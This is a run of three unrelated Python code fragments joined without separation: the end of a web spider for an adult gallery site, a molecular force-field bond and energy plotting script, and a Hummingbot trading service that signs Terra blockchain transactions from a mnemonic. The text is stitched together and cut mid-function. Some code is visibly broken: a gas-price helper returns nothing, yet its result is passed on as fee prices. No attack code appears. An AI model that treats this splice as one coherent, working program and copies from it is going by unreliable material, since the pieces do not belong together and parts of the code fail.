..rating import parse_rating class Ehentai(RequestMethodMixin, RedisSpider): name = 'ehentai' @property def request_method_mapping(self): return { 'uri': self.make_uri_requests, 'query': self.make_query_requests, } def make_query_requests(self, query): yield Request( make_query_uri(query), callback=self.parse, meta=dict(query=query), dont_filter=True, ) def make_uri_requests(self, query): yield Request( query['uri'], callback=self.parse, meta=dict(query=query), dont_filter=True, ) def parse(self, response): query = response.meta['query'] try: sel = Selector(response) return Page( uri=response.url, query=query, posts=[make_post(sub) for sub in sel.xpath( '//table[@class="itg"]/tr[starts-with(@class, "gtr")]' )] ) except: return failed(query, traceback.format_exc(), response=response) class PostLoader(ItemLoader): default_item_class = Post default_input_processor = Identity() default_output_processor = TakeFirst() def ctime_in(self, values): for s in values: yield ( datetime .strptime(s.strip(), '%Y-%m-%d %H:%M') .replace(tzinfo=pytz.timezone('America/Anguilla')) # UTC -4 .astimezone(pytz.utc) .strftime(TIME_FORMAT) ) def cover_uri_in(self, values): for s in values: if s.startswith('http://'): yield s else: parts = s.split('~') # title may contain ~ if len(parts) >= 4 and parts[0] == 'init': yield 'http://%s/%s' % (parts[1], parts[2]) def rating_in(self, values): for s in values: yield parse_rating(s) def make_post(sel): loader = PostLoader(selector=sel) loader.add_xpath('uri', './/div[@class="it5"]/a/@href') loader.add_xpath('title', 'string(.//div[@class="it5"]/a)') loader.add_xpath('cover_uri', './/div[@class="it2"]/img/@src') loader.add_xpath('cover_uri', './/div[@class="it2"]/text()') loader.add_xpath('category', './/td[@class="itdc"]//img/@alt') loader.add_xpath('ctime', './/td[@class="itd"]/text()') loader.add_xpath('uploader', 'string(.//td[@class="itu"]//a)') loader.add_xpath('rating', './/div[@class="it4"]/div/@style') loader.add_xpath('torrent_uri', './/div[@class="it3"]//a/@href') return loader.load_item() def make_query_uri(query): get = lambda name: 1 if len(query) == 2 else int(query.get(name, 0)) return 'http://g.e-hentai.org/?' + urlencode({ 'f_doujinshi': get('doujinshi'), 'f_manga': get('manga'), 'f_artistcg': get('artistcg'), 'f_gamecg': get('gamecg'), 'f_western': get('western'), 'f_non-h': get('non-h'), 'f_imageset': get('imageset'), 'f_cosplay': get('cosplay'), 'f_asianporn': get('asianporn'), 'f_misc': get('misc'), 'f_search': query['query'].encode('utf-8'), 'f_apply': 'Apply+Filter', }) import matplotlib.pyplot as plt def flag_measurements(fname='bonds_N-C_deg-2.npz', mindb=None, groups=None, minfname='bonds_N-C_deg-2.minimum.npz', params={"Mol": {}, "Bonds": ['b1'], "Angles": [], "ImproperTorsions": [], "ProperTorsions": [], 'Energy': {}} ): """ energy is a list of keys to search for energy, example: {'oFF'; 'vdW'}. Plotted energies are relative to the min value. """ d = None m = None rms_str="ffRMS(L)= {:9.4e} ffRMS(E)= {:9.4e} measL= {:9.4e} measRMS(L)= {:9.4e} measRMS(E)= {:9.4e} " rms_str="{:9.4f} {:9.4f} {:9.4f} {:9.4f} {:9.4f} " ene_str="{:s}: meanE= {:9.4f} RMS(E)= {:9.4f} maxAngEne= {:9.4f} {:9.4f}" ene_maxdel_str="DmeanE= {:9.4f} maxDiffAngEne= {:9.4f} {:9.4f} maxGapAngEne {:9.4f} {:9.4f}" ref_ene_key = 'qm' index = None if os.path.exists("index.txt"): with open("index.txt", 'r') as fid: index = dict([line.strip('\n').split()[::-1] for line in fid.readlines()]) elif os.path.exists(os.path.join("..","index.txt")): with open(os.path.join("..","index.txt"), 'r') as fid: index = dict([line.strip('\n').split()[::-1] for line in fid.readlines()]) if(os.path.exists(fname)): d = np.load(fname, allow_pickle=True) if(mindb is not None): m = mindb elif(os.path.exists(minfname)): if(minfname.split('.')[-1] == "npz"): m = np.load(minfname, allow_pickle=True) else: with open(minfname, "rb") as fid: m = dict(pickle.load(fid)) if(m is None): return if("Mol" not in params): params["Mol"] = {} params_new = collections.defaultdict(list) params_new.update(params) params = params_new params_new = None measurements = ["Bonds", "Angles", "ImproperTorsions", "ProperTorsions", "Energy"] colors = ['red', 'blue', 'purple', 'green', 'orange', 'yellow'] rows = 1 hasbonds = int(len(params["Bonds"]) > 0) hasangles = int(len(params["Angles"]) + len(params["ImproperTorsions"]) + len(params["ProperTorsions"]) > 0) hasenergy = int(len(params["Energy"]) > 0) rows = hasbonds + hasangles + hasenergy logger.debug("VAR: rows= " + str(rows)) mol_list = params['Mol'] if(mol_list == {}): vals = list(m["mol_data"].keys()) mol_list = dict(zip(range(len(vals)), vals)) param_list = [p for p_list in measurements for p in params[p_list]] ene_out_fname = ("ene."+"{:s}."*len(param_list)+"txt").format(*param_list) fid = open(ene_out_fname, 'w') ; fid.close() # this is looping through each molecule for jj, (name, smiles_list) in enumerate(mol_list.items()): print("{:4d} {:4d} {:64s}:".format(jj,int(index[name]),name), end=" ") hits=0 fig = plt.figure(figsize=(8,4*rows),dpi=120) logger.debug("fig created id " + str(id(fig))) ax_grid = [] #[[]]*rows for r in range(rows): logger.debug("Init row {} for axes\n".format(r)) ax = [plt.subplot2grid((rows,3),(r,0), colspan=2, fig=fig)] ax.append(plt.subplot2grid((rows,3),(r,2), fig=fig, sharey=ax[0])) logger.debug("ax left {} ax right {}\n".format(id(ax[0]), id(ax[1]))) ax_grid.append(ax) logger.debug("axes look like\n{}\n".format(str(ax_grid))) checks = [[["Bonds"], hasbonds], \ [["Angles", "ProperTorsions", "ImproperTorsions"], hasangles],\ [["Energy"], hasenergy]] present = 0 plot_idx = {} for ncheck_i, check_i in enumerate(checks): if(check_i[1]): for param in check_i[0]: plot_idx[param] = present present += 1 logger.debug("Will plot using {} axes\n".format(present)) logger.debug(str(plot_idx)) fig.subplots_adjust(wspace=.3, hspace=.2,right=.95) ddata = [] mdata = {} mdatamean = {} lows = [] #first is key #then is param vs data # then is 1xN for param data (choose 0) # then is param #oFF_labels = [c[0] for c in m.values()] used_labels = [] c_idx = -1 used_colors = {} bond_r0 = {} bond_k = {} bond_smirks = {} smiles_hits = [] smiles_idx = [] bond_dict = {} nonempty_ene = False # this is looping through each conformation of the molecule for ii,smiles in enumerate(smiles_list): all_params = [] skip=False if(len(params["Energy"].keys()) > 0): for ene_group in params["Energy"]: if("energy" not in m["mol_data"][smiles]): logger.debug("SKIP 1") skip=True break if(ene_group == 'qm'): if('qm' not in m["mol_data"][smiles]["energy"]): logger.debug("SKIP 2") skip=True break else: for ene_type in params["Energy"][ene_group]: if(ene_type not in m["mol_data"][smiles]["energy"][ene_group]): logger.debug("SKIP 3") skip=True break if(skip): break if(skip): break if(skip): break for measure in measurements: if(measure == "Energy"): continue try: all_params += [p['oFF'] for p in m["mol_data"][smiles][measure]["indices"].values()] except KeyError: print("Mol with smiles", smiles, "empty or corrupted (missing", measure, ". Skipping") skip=True break if(skip): break for param in params[measure]: if(not (param in all_params)): #print(smiles, "Does not have", param) skip=True break if(skip): continue #print("HIT!") #try: #print(m[smiles].shape, end=" ") #if(False and (not (d is None)) and smiles in d): if(0): for i,(j,jmin) in enumerate(zip(d[smiles][1].T[1:],m[smiles][1].T[1:])): label = m[smiles][0][0][i]['id'] #print(ii, i, smiles, end=" ") ax = subplot2grid((1,3),(0,0), colspan=2) ax.plot(d[smiles][1][:,0], j,'b.', ms=5) ax.plot(m[smiles][1][:,0], jmin, 'k.-', ms=7) ddata += list(j) mdata.setdefault(m[smiles][0][i], []) mdata[m[smiles][0][i]] += list(jmin) ax2.hist(j,bins=10, color='b', orientation='horizontal') ax2.hist(jmin,bins=10, color='k', orientation='horizontal') else: for measure_ii, measure in enumerate(measurements): logger.debug("VAR: measure= " + str(measure)) if(measure not in params): logger.debug("Not in params so skipping: " + str(measure)) continue if(len(params[measure]) == 0): logger.debug("Nothing in params for: " + str(measure) + " so skipping") continue if(measure != "Energy"): for i,(index_key,index_dat) in enumerate(m["mol_data"][smiles][measure]["indices"].items()): label = index_dat['oFF'] #print(ii, i, smiles, jmin.mean(), end=" ") plot_label=None if(not (label in params[measure])): logger.debug("This param not wanted so skipping: " + str(label)) #print("param", label, " not wanted. skipping") continue logger.debug("Continuing to plot for : " + str(label)) hits += 1 #print(index_key) if(not (smiles in smiles_hits)): smiles_hits.append(smiles) smiles_idx.append(ii) if(not (label in used_labels)): plot_label=label used_labels.append(label) c_idx += 1 used_colors[label] = colors[c_idx] if( not ( label in ["a0", "b0", "t0", "i0"] )): if(measure == "Bonds"): bond_r0[label] = m['oFF'][label]['length'] elif(measure == "Angles"): bond_r0[label] = m['oFF'][label]['angle'] bond_smirks[label] = m['oFF'][label]['smirks'] bond_dict[label] = m['oFF'][label] if( not (label[0] in 'ti')): bond_k[label] = m['oFF'][label]['k'] color = used_colors[label] td_ang = m["td_ang"][m["mol_data"][smiles]["td_ang"]] measure_data = m["mol_data"][smiles][measure]["values"][:,index_dat["column_idx"]] #if(measure == "Angles"): # pass #measure_data *= np.pi/180 #print(plot_idx, "plotting", label, "td_ang=", td_ang) if(td_ang[0] is not None): logger.debug("***PLOTTING {:s} to ax {:s} id {}\n".format( str(measure), str(plot_idx[measure]), id(ax_grid[plot_idx[measure]][0]))) ax_grid[plot_idx[measure]][0].plot(td_ang, measure_data, lw=.1, ls='-', marker='.' , color=color, label=plot_label, ms=2) ax_grid[plot_idx[measure]][0].legend(loc='upper right') if(label not in mdata): mdata[label] = [] mdata[label] += list(measure_data) mdatamean.setdefault(smiles, {}) mdatamean[smiles].setdefault(label, []) mdatamean[smiles][label].append(measure_data.mean()) else: for ene_group in params['Energy']: logger.debug("VAR: ene_group=" + str(ene_group)) if(ene_group == 'qm'): c_idx += 1 used_colors[ene_group] = colors[c_idx] label = ene_group color = used_colors[label] ene = np.array(m["mol_data"][smiles]['energy'][ene_group]) * hartree2kcalmol ene -= ene.min() td_ang = m["td_ang"][m["mol_data"][smiles]["td_ang"]] if(td_ang[0] is not None): logger.debug("plotting to idx" + str(plot_idx[measure]) + " for measure " + str(measure) ) logger.debug("***PLOTTING {:s} to ax {:s} id {}\n".format( str(measure), str(plot_idx[measure]), id(ax_grid[plot_idx[measure]][0]))) ax_grid[plot_idx[measure]][0].plot(td_ang, ene, lw=1.5, ls='-', marker='.', ms=4, color=color, label=label) ax_grid[plot_idx[measure]][0].set_ylabel("Energy (kcal/mol)") nonempty_ene = True if(label not in mdata): mdata[label] = [] mdata[label] += list(ene) mdatamean.setdefault(smiles, {}) mdatamean[smiles].setdefault(label, []) mdatamean[smiles][label].append(ene.mean()) else: logger.debug("VAR: ene_types=" + str(list(params["Energy"].keys()))) for ene_type in params["Energy"][ene_group]: logger.debug("VAR: ene_type=" + str(ene_type)) ene = m["mol_data"][smiles]['energy'][ene_group][ene_type] if(len(ene) > 0 and isinstance(ene[0], simtk.unit.Quantity)): ene = np.array([x.value_in_unit(x.unit) for x in ene]) ene -= ene.min() else: ene = np.array(ene) ene -= ene.min() label = ".".join((ene_group, ene_type)) c_idx += 1 used_colors[label] = colors[c_idx % len(colors)] color = used_colors[label] td_ang = m["td_ang"][m["mol_data"][smiles]["td_ang"]] if(td_ang[0] is not None): logger.debug("plotting to idx " + str(plot_idx[measure]) + " for measure " + str(measure) ) ax_grid[plot_idx[measure]][0].plot(td_ang, ene, lw=1.5, ls='-', marker='.', ms=4, color=color, label=label) ax_grid[plot_idx[measure]][0].set_ylabel("Energy (kcal/mol)") nonempty_ene = True if(label not in mdata): mdata[label] = [] mdata[label] += list(ene) mdatamean.setdefault(smiles, {}) mdatamean[smiles].setdefault(label, []) mdatamean[smiles][label].append(ene.mean()) if(nonempty_ene): ax_grid[plot_idx[measure]][0].legend(loc='upper left') #elif(jmin.mean() < 1.433): # print("Med:", ii, k) #else: # print("High:", ii, k) #print() #except TypeError: # print("TypeError") #except IndexError: # print("IndexError") title = str(dict([(k,v) for k,v in params.items() if (v != [] and k != "Mol")])) print("HITS= {:7.1f}".format(hits/len(smiles_list)), end=" ") for p in param_list: if( p in ["a0", "b0", "i0", "t0"] ): m['oFF'][p]['smirks'] = "None" logger.debug("hits or nonempty? " + str(hits > 0 or nonempty_ene)) if(hits > 0 or nonempty_ene): smiles_idx_str = ("{:s}."*len(smiles_idx)).format(*[str(x) for x in smiles_idx]) param_str = ("{:s}."*len(param_list)).format(*[str(x) for x in param_list]) if(len(ddata) > 0): ax2.hist(ddata,bins=20, color='blue', orientation='horizontal') kT = (.001987*298.15) for ii,(label,dat) in enumerate(mdata.items()): #if(label[0] in "ait"): # #num *= np.pi/180 # if(rows == 2): # plot_idx = 1 # else: # plot_idx = 0 plot_row = -1 if(label[0] in "ait"): plot_row = plot_idx["Angles"] elif(label[0] == "b"): plot_row = plot_idx["Bonds"] else: plot_row = plot_idx["Energy"] logger.debug("VAR: plot_row=" + str(plot_row)) color=used_colors[label] ax_grid[plot_row][1].hist(dat,bins=20, color=used_colors[label], histtype='step', orientation='horizontal') if( label in ["a0", "b0", "t0", "i0"] ): continue # TODO: calculate spread of torsions if(label[0] not in 'ab'): continue num = float(str(bond_r0[label]).split()[0]) force_k = float(str(bond_k[label]).split()[0]) delta = (2*(kT)/force_k)**.5 if(label[0] in "ait"): delta *= 180/np.pi dat = np.array(dat) if((dat < (num - delta)).any() or (dat > (num + delta)).any()): print(label + "= R", end=" ") elif(dat.max() < num or dat.min() > num): print(label + "= Y", end=" ") else: print(label + "= G", end=" ") ax_grid[plot_row][0].axhline(y=num, ls='-', marker='.', color='black', ms=20, mec='black', mfc=color) ax_grid[plot_row][0].axhline(y=num + delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color) ax_grid[plot_row][0].axhline(y=num - delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color) ax_grid[plot_row][1].axhline(y=num, ls='-', marker='.', color='black', ms=20, mec='black', mfc=color) ax_grid[plot_row][1].axhline(y=num + delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color) ax_grid[plot_row][1].axhline(y=num - delta, ls='--', marker='.', color='black', ms=10, mec='black', mfc=color) #ax[0].legend() #if(rows > 1): # ax[1].legend() print_header = True smiles_out_fname = ("mol." + str(index[smiles]) + ".smiles_with."+"{:s}."*len(param_list)+"txt").format(*param_list) #if(os.path.exists(smiles_out_fname)): # print_header = False with open(smiles_out_fname, 'w') as fid: for measure in measurements: mol_label_count = 0 for label in params[measure]: if((label not in bond_r0) ): continue label_count = 0 #r0 = float(str(bond_r0[label]).split()[0]) r0 = bond_r0[label] / bond_r0[label].unit force_k = bond_k[label] / bond_k[label].unit delta = 2*kT/force_k**.5 smirks = bond_dict[label]['smirks'] #delta *= 180/np.pi #pass if(measure in ["Angles", "ImproperTorsions", "ProperTorsions"] ): delta = 2*kT/(force_k * (np.pi/180)**2 )**.5 if(print_header): fid.write("# {:3s} {:24s} \n".format(label, smirks)) fid.write("# r0 = {:6.2f}, k = {:6.2f} kT-> {:6.2f}\n".format(r0, force_k, delta)) fid.write("#{:4s} {:5s} {:4s} {:60s} {:10s} {:10s} {:10s} {:10s} {:10s}\n".format("idx", "count", "flag", "category", "ffRMS(L)", "ffRMS(E)", "measL", "measRMS(L)", "measRMS(E)")) if(measure in ["Angles", "ImproperTorsions", "ProperTorsions"] ): force_k = force_k * (np.pi/180)**2 # put into degrees #num *= np.pi/180 #print([(smiles, mdatamean[smiles]) for smiles in smiles_hits]) dat = [] outstr = [] per_term_flag = "G" flag = "G" bond_indices = [] valence_term = {} for idx,smiles in zip(smiles_idx,smiles_hits): for index_key, index_dat in m["mol_data"][smiles][measure]["indices"].items(): if(index_dat['oFF'] == label): bond_indices.append(index_key) valence_term[index_key] = [] for index_key in valence_term: single_terms = [] index_count = 0 for idx,smiles in zip(smiles_idx,smiles_hits): try: col_idx = m["mol_data"][smiles][measure]["indices"][index_key]["column_idx"] except KeyError as e: logger.warning("\n** Missing" + str(e) + ": Probably different molecules with same smiles. Check the output! ** ") continue vals = np.atleast_1d(m["mol_data"][smiles][measure]["values"][:,col_idx]) valence_term[index_key] = np.append(valence_term[index_key], vals) flag = "G" if((vals < (r0 - delta)).any() or (vals > (r0 + delta)).any()): flag = "R" elif(vals.max() < r0 or vals.min() > r0): flag = "Y" avglen = vals.mean() rmslen = rms(vals - r0) rmsene = rms(force_k/2 * (vals - r0)**2) mrmslen = rms(vals - avglen) mrmsene = rms(force_k/2 * (vals - avglen)**2) single_terms.append((" {:4d} {:5d} {:>4s} {:60s} " + rms_str + "\n").format(jj,len(vals), flag,"--->conformation "+ get_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) if(vals.size > 1): for kk,val in enumerate(vals): flag = "G" if((val < (r0 - delta)) or (val > (r0 + delta))): flag = "R" elif(val < r0 or val > r0): flag = "X" avglen = val rmslen = rms(val - r0) rmsene = rms(force_k/2 * (val - r0)**2) mrmslen = rms(val - avglen) mrmsene = rms(force_k/2 * (val - avglen)**2) single_terms.append((" {:4d} {:5d} {:>4s} {:60s} " + rms_str + "\n").format(jj,1, flag,".....>intermediate "+str(kk),rmslen, rmsene, avglen, mrmslen, mrmsene)) index_count += len(vals) avglen = valence_term[index_key].mean() rmslen = rms(valence_term[index_key] - r0) rmsene = rms(force_k/2 * (valence_term[index_key] - r0)**2) mrmslen = rms(valence_term[index_key] - avglen) mrmsene = rms(force_k/2 * (valence_term[index_key] - avglen)**2) flag = "G" if((valence_term[index_key] < (r0 - delta)).any() or (valence_term[index_key] > (r0 + delta)).any()): flag = "R" elif(valence_term[index_key].max() < r0 or valence_term[index_key].min() > r0): flag = "Y" outstr.append((" {:4d} {:5d} {:>4s} {:60s} " + rms_str + "\n").format(jj, index_count, flag,"==>atoms " + str(index_key),rmslen, rmsene, avglen, mrmslen, mrmsene)) [outstr.append(term) for term in single_terms] dat = np.append(dat, valence_term[index_key]) #if(measure == "Angles"): # pass #dat *= np.pi/180 mol_label_count += len(dat) if(len(dat) > 0): flag = "G" if((dat < (r0 - delta)).any() or (dat > (r0 + delta)).any()): flag = "R" elif(dat.max() < r0 or dat.min() > r0): flag = "Y" avglen = dat.mean() rmslen = rms(dat - r0) rmsene = rms(force_k/2 * (dat - r0)**2) mrmslen = rms(dat - avglen) mrmsene = rms(force_k/2 * (dat - avglen)**2) fid.write((" {:4d} {:5d} {:>4s} {:60s} " + rms_str + "\n").format(jj,mol_label_count, flag,"|>molecule " + strip_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) [fid.write(s) for s in outstr] print(rms_str.format(rmslen, rmsene, avglen, mrmslen, mrmsene), end=" ") fragstr = "all" # ene_str="{:s}: meanE= {:9.4f} RMS(E)= {:9.4} maxAngEne= {:9.4f} {:9.4f}" # ene_maxdel_str="DmeanE= {:9.4f} maxDiffAngEne= {:9.4f} {:9.4f} maxGapAngEne {:9.4f} {:9.4f}" # ref_ene_key = 'qm' # if len(params["Energy"]) > 1: with open(ene_out_fname, 'a') as fid: measure = "Energy" mol_label_count = 0 ref_ene = np.array(mdata[ref_ene_key]) logger.debug("VAR: ref_ene= " + str(ref_ene)) ref_ene_max_idx = ref_ene.argmax() td_ang = m["td_ang"][m["mol_data"][smiles]["td_ang"]] if(td_ang[0] == None): continue fid.write((" {:4d} {:5d} {:>4s} {:60s} " + ene_str + "\n").format(jj,len(ref_ene), "REF","|>molecule " + strip_conformation_number(smiles),ref_ene_key, ref_ene.mean(), rms(ref_ene - ref_ene.mean()), td_ang[ref_ene_max_idx], ref_ene[ref_ene_max_idx])) ene_list = {x:y for x,y in params["Energy"].items() if x != "qm"} for ene_group in ene_list: for ene_type in ene_list[ene_group]: label = ".".join((ene_group, ene_type)) ene = np.array(mdata[label]) ene_max_idx = ene.argmax() delta = ene - ref_ene delta_max_idx = np.abs(delta).argmax() fid.write((" {:4d} {:5d} {:>4s} {:60s} " + ene_str + " " + ene_maxdel_str +"\n").format(jj,len(ene), "","==> " + label, "", ene.mean(), rms(ene - ene.mean()), td_ang[ene_max_idx], ene[ene_max_idx], ene.mean() - ref_ene.mean(), td_ang[ene_max_idx] - td_ang[ref_ene_max_idx], ene[ene_max_idx] - ref_ene[ref_ene_max_idx], td_ang[delta_max_idx], delta[delta_max_idx])) # need argmax of ref for angle and ene # need mean angle # for label in params[measure]: # if(("qm" not in label) or ("oFF" not in label)): # continue # label_count = 0 # #r0 = float(str(bond_r0[label]).split()[0]) # # #delta *= 180/np.pi # #pass # if(print_header): # fid.write("#{:4s} {:5s} {:4s} {:50s} {:10s} {:10s} {:10s} {:10s} {:10s}\n".format("idx", "count", "flag", "category", "ffRMS(L)", "ffRMS(E)", "measL", "measRMS(L)", "measRMS(E)")) # # #need argmax of angle and ene # # need argmax of different between data and ref # # # have a reference ene (the qm) # dat = [] # outstr = [] # per_term_flag = "X" # flag = "X" # bond_indices = [] # valence_term = {} # # # single_terms = [] # index_count = 0 # for idx,smiles in zip(smiles_idx,smiles_hits): # try: # col_idx = m["mol_data"][smiles][measure]["indices"][index_key]["column_idx"] # except KeyError as e: # logger.warning("\n** Missing" + str(e) + ": Probably different molecules with same smiles. Check the output! ** ") # continue # vals = np.atleast_1d(m["mol_data"][smiles][measure]["values"][:,col_idx]) # valence_term[index_key] = np.append(valence_term[index_key], vals) # flag = "G" # if((vals < (r0 - delta)).any() or (vals > (r0 + delta)).any()): # flag = "R" # elif(vals.max() < r0 or vals.min() > r0): # flag = "Y" # avglen = vals.mean() # rmslen = rms(vals - r0) # rmsene = rms(force_k/2 * (vals - r0)**2) # mrmslen = rms(vals - avglen) # mrmsene = rms(force_k/2 * (vals - avglen)**2) # single_terms.append((" {:4d} {:5d} {:>4s} {:50s} " + rms_str + "\n").format(jj,len(vals), flag,"--->conformation "+ get_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) # if(vals.size > 1): # for kk,val in enumerate(vals): # flag = "G" # if((val < (r0 - delta)) or (val > (r0 + delta))): # flag = "R" # elif(val < r0 or val > r0): # flag = "X" # avglen = val # rmslen = rms(val - r0) # rmsene = rms(force_k/2 * (val - r0)**2) # mrmslen = rms(val - avglen) # mrmsene = rms(force_k/2 * (val - avglen)**2) # single_terms.append((" {:4d} {:5d} {:>4s} {:50s} " + rms_str + "\n").format(jj,1, flag,".....>intermediate "+str(kk),rmslen, rmsene, avglen, mrmslen, mrmsene)) # index_count += len(vals) # avglen = valence_term[index_key].mean() # rmslen = rms(valence_term[index_key] - r0) # rmsene = rms(force_k/2 * (valence_term[index_key] - r0)**2) # mrmslen = rms(valence_term[index_key] - avglen) # mrmsene = rms(force_k/2 * (valence_term[index_key] - avglen)**2) # # flag = "G" # if((valence_term[index_key] < (r0 - delta)).any() or (valence_term[index_key] > (r0 + delta)).any()): # flag = "R" # elif(valence_term[index_key].max() < r0 or valence_term[index_key].min() > r0): # flag = "Y" # outstr.append((" {:4d} {:5d} {:>4s} {:50s} " + rms_str + "\n").format(jj, index_count, flag,"==>atoms " + str(index_key),rmslen, rmsene, avglen, mrmslen, mrmsene)) # [outstr.append(term) for term in single_terms] # dat = np.append(dat, valence_term[index_key]) # # #if(measure == "Angles"): # # pass # #dat *= np.pi/180 # # mol_label_count += len(dat) # if(len(dat) > 0): # flag = "G" # if((dat < (r0 - delta)).any() or (dat > (r0 + delta)).any()): # flag = "R" # elif(dat.max() < r0 or dat.min() > r0): # flag = "Y" # avglen = dat.mean() # rmslen = rms(dat - r0) # rmsene = rms(force_k/2 * (dat - r0)**2) # mrmslen = rms(dat - avglen) # mrmsene = rms(force_k/2 * (dat - avglen)**2) # # fid.write((" {:4d} {:5d} {:>4s} {:50s} " + rms_str + "\n").format(jj,mol_label_count, flag,"|>molecule " + strip_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) # [fid.write(s) for s in outstr] # print(rms_str.format(rmslen, rmsene, avglen, mrmslen, mrmsene), end=" ") if("fragment" in m): fragstr = m["fragment"] fig.suptitle(("frag={:s} " + "{:s}").format(fragstr,smiles)) fig.savefig("fig.mol_" + str(index[smiles]) + "." + param_str +"png") plt.close(fig) print() hummingbot/strategy/oracle_sniper_limit/terra_service.py import asyncio import requests import string,os,time,sys,json from decimal import Decimal from terra_sdk.client.lcd import LCDClient, AsyncLCDClient from terra_sdk.key.mnemonic import MnemonicKey from terra_sdk.core import Coin, Coins from terra_sdk.core.bank.msgs import MsgSend from terra_sdk.core.market import MsgSwap from terra_sdk.client.lcd.api.oracle import OracleAPI from terra_sdk.client.lcd.api.staking import StakingAPI from terra_sdk.client.lcd.api.wasm import WasmAPI from terra_sdk.core.wasm import MsgStoreCode, MsgInstantiateContract, MsgExecuteContract from terra_sdk.core.auth.data.tx import StdFee from hummingbot.strategy.oracle_sniper_limit.singleton import Singleton from hummingbot.core.utils.async_utils import safe_ensure_future @Singleton class TerraService(): # We use StrategyPyBase to inherit the structure. We also # create a logger object before adding a constructor to the class. chain_id = 'columbus-5' chain_url = 'https://lcd.terra.dev' def __init__(self): self.mk = None self.wallet = None self.terra = None self._main_task = None self.is_ready = True if self._main_task is None or self._main_task.done(): self._main_task = safe_ensure_future(self.main()) async def main(self): await self.create_client() def test(self): print("test") async def create_client(self): print("creating terraswap client...") res = self.request_updated_gas_prices() async with AsyncLCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") as terra: self.terra = terra SECRET_TERRA_MNEMONIC = os.getenv('SECRET_TERRA_MNEMONIC') if os.getenv("SECRET_TERRA_MNEMONIC") is not None: self.mk = MnemonicKey(mnemonic=SECRET_TERRA_MNEMONIC) self.wallet = self.terra.wallet(self.mk) bal = await self.request_updated_wallet_balance() else: print("Something Went Wrong. Hummingbot shutting down now...") time.sleep(3) sys.exit("Something Went Wrong!") self.load_files() self.pull_api_info() async def request_updated_wallet_balance(self): print("checking available balance...") res = self.request_updated_gas_prices() async with AsyncLCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") as terra: self.terra = terra self.balance = await self.terra.bank.balance(self.mk.acc_address) return self.balance async def contract_query(self, pool): res = self.request_updated_gas_prices() async with AsyncLCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") as terra: self.terra = terra assets = await self.terra.wasm.contract_query(pool, { "pool": {} }) return assets # Utils def balance_above_min_threshold(self, balance, currency, threshold): print("balance_above_min_threshold", balance, currency, threshold) if balance.get(currency) is not None: coinbal = balance[currency] return coinbal.amount > int(threshold) else: return False def coin_to_denom(self, coin): target = '' cwd = os.getcwd() coin_to_denom = json.load(open(cwd+'/hummingbot/strategy/limit_order/coin_to_denom.json')) for attribute, value in coin_to_denom.items(): # print(attribute, value) # example usage if coin == attribute: # Get coin denomination from Trading Pair name target = value return target def get_balance_from_wallet(self, balance, base): print("get_balance_from_wallet", balance, base) if balance.get(base) is not None: coinbalance = balance[base] return coinbalance else: return False # Public api.terraswap.io Library Methods def request_updated_gas_prices(self): self.gas_prices = requests.get("https://fcd.terra.dev/v1/txs/gas_prices").json() def pull_api_info(self): self.request_cw20_tokens() self.request_cw20_pairs() self.request_asset_info_pairs() def get_tokens(self): return self.request_cw20_tokens() def get_pair_txs(self, pair_address:string): txns = requests.get('https://api.terraswap.io/dashboard/txs?page=1&pair='+pair_address).json() return txns def get_pair_pricing(self, pair_address): pricing = requests.get('https://api.terraswap.io/dashboard/pairs/'+pair_address).json() return pricing def get_token_pricing(self, pair_address, symbol): pricing = requests.get('https://api.terraswap.io/dashboard/pairs/'+pair_address).json() token = [] if pricing.get("token0") is not None: if pricing["token0"]["symbol"] == symbol: token = pricing["token0"] if pricing.get("token1") is not None: if pricing["token1"]["symbol"] == symbol: token = pricing["token1"] return token def get_currency_amount_from_wallet_balance(self, balance, currency): print("get_currency_amount_from_wallet_balance", balance, currency) amount = 0 if balance.get(currency) is not None: amount = balance[currency].amount else: amount = 0 return amount def get_base_tx_size_from_balance(self, balance, currency, DEFAULT_BASE_TX_SIZE): print("get_base_tx_size_from_balance", balance, currency, DEFAULT_BASE_TX_SIZE) if balance.get(currency) is not None: amount = balance[currency].amount size = amount*float(DEFAULT_BASE_TX_SIZE) else: size = 0 return int(size) def request_cw20_tokens(self): self.cw20_tokens = requests.get('https://api.terraswap.io/tokens').json() return self.cw20_tokens def request_cw20_pairs(self): self.cw20_pairs = requests.get('https://api.terraswap.io/dashboard/pairs').json() return self.cw20_pairs def request_asset_info_pairs(self): self.asset_info_pairs = requests.get('https://api.terraswap.io/pairs').json() return self.asset_info_pairs def load_files(self): self.open_cw20() self.open_ibc() self.open_fcw20pairs() self.open_coin_to_denom() # local terraswap methods def open_cw20(self): self.cw20_json = json.load(open(os.getcwd()+'/hummingbot/strategy/limit_order/cw20.json')) return self.cw20_json def open_ibc(self): self.ibc_json = json.load(open(os.getcwd()+'/hummingbot/strategy/limit_order/ibc.json')) return self.ibc_json def open_fcw20pairs(self): self.cw20pairs_json = json.load(open(os.getcwd()+'/hummingbot/strategy/limit_order/pairs.dex.json')) return self.cw20pairs_json def open_coin_to_denom(self): self.coin_to_denom_json = json.load(open(os.getcwd()+'/hummingbot/strategy/limit_order/coin_to_denom.json')) return self.coin_to_denom_json # Contract Methods async def broadcast_tx(self, tx): res = self.request_updated_gas_prices() async with AsyncLCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") as terra: self.terra = terra async def send(self, recipient_wallet_addr, coins): wallet = self.terra.wallet(self.mk) account_number = await wallet.account_number() tx = await wallet.create_and_sign_tx( msgs=[MsgSend(wallet.key.acc_address, recipient_wallet_addr, coins)] ) result = self.terra.tx.broadcast(tx) async def coin_swap(self, tx_size, offer_target, ask_target): # Get reference to wallet wallet = self.terra.wallet(self.mk) account_number = await wallet.account_number() swap = MsgSwap(self.mk.acc_address, str(tx_size)+''+offer_target, ask_target) sequence = self.wallet.sequence() tx = await wallet.create_and_sign_tx( msgs=[swap], 